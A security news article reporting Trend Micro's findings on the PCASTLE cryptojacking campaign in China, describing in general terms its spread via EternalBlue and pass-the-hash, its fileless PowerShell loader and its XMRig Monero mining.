Cryptojacking campaign strikes China with fileless attacks

Mining for Monero is the campaign’s ultimate goal.
Written by Charlie Osborne, Contributing Writer

A spike of attacks taking place in China has revealed a renewed cryptojacking campaign which is employing fileless attacks to drain victim system power in order to mine for Monero.

Trend Micro researchers said on Wednesday that the campaign, dubbed PCASTLE, is ongoing, while the peak of activity so far was previously registered on May 22. In total, 92 percent of infections are in China and the operators behind PCASTLE do not appear to be focusing on particular industries or victims.

"The campaign's operators also do not seem to care who gets affected, as long as they get infected," the researchers say.

PCASTLE makes use of multiple propagation methods to ensure infection. This includes exploiting the EternalBlue Microsoft Windows SMB exploit, brute-force credential attacks, and what is known as a "pass the hash" technique -- the use of stolen hashed user credentials to trick an authentication system without needing to crack the information.

If one of these methods succeed, either a scheduled task or RunOnce registry key is executed to download the campaign's first payload, a malicious PowerShell script.

This script is able to download additional payloads and execute them in memory only, a fileless approach which can make detection of the malware more difficult by traditional antivirus products.

In addition, the PowerShell script will attempt to access a list of URLs coded within the script, will create scheduled tasks on an hourly basis to maintain persistence, and furthermore will download another script for communicating with the operator's command-and-control (C2) server.

CNET: FBI, TSA use of facial recognition tech needs cleaning up, say lawmakers

The downloaded URLs are for the C2 and the address in which the cryptocurrency mining script is hosted.

Information relating to the victim system, including PC name, MAC address, OS, and timestamps are then sent to the attacker's C2. Another PowerShell script is downloaded and executes a cryptocurrency mining module based on the victim PC's architecture.

XMRig is the script of choice and Monero (XMR) is mined.


"Algorithms for Monero mining are not as resource-intensive compared to other miners, and don't require a lot of processing power," Trend Micro says. "This means they can illicitly mine the cryptocurrency without alerting users unless they notice certain red flags like performance issues."

TechRepublic: Employees are almost as dangerous to business security as hackers and cybercriminals

Mining for cryptocurrency, unlike ransomware, can guarantee a small rate of return on an infection. Over the past few weeks other major cryptojacking campaigns have been discovered, including the infection of 50,000 MS-SQL and PHPMyAdmin servers in the cryptocurrency mining Nansh0u campaign, and the emergence of a new malware family, BlackSquid, which also employs XMRig.

See also: This is how hackers make money from your stolen medical data

"The attackers' motivations for concentrating their activities back on China-based systems are unclear," the researchers added. "Nonetheless, this campaign showed that fileless threats aren't going away. In fact, we project that fileless techniques will be among the most prevalent threats used in the current landscape." 

Europol’s top hacking ring takedowns

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Editorial standards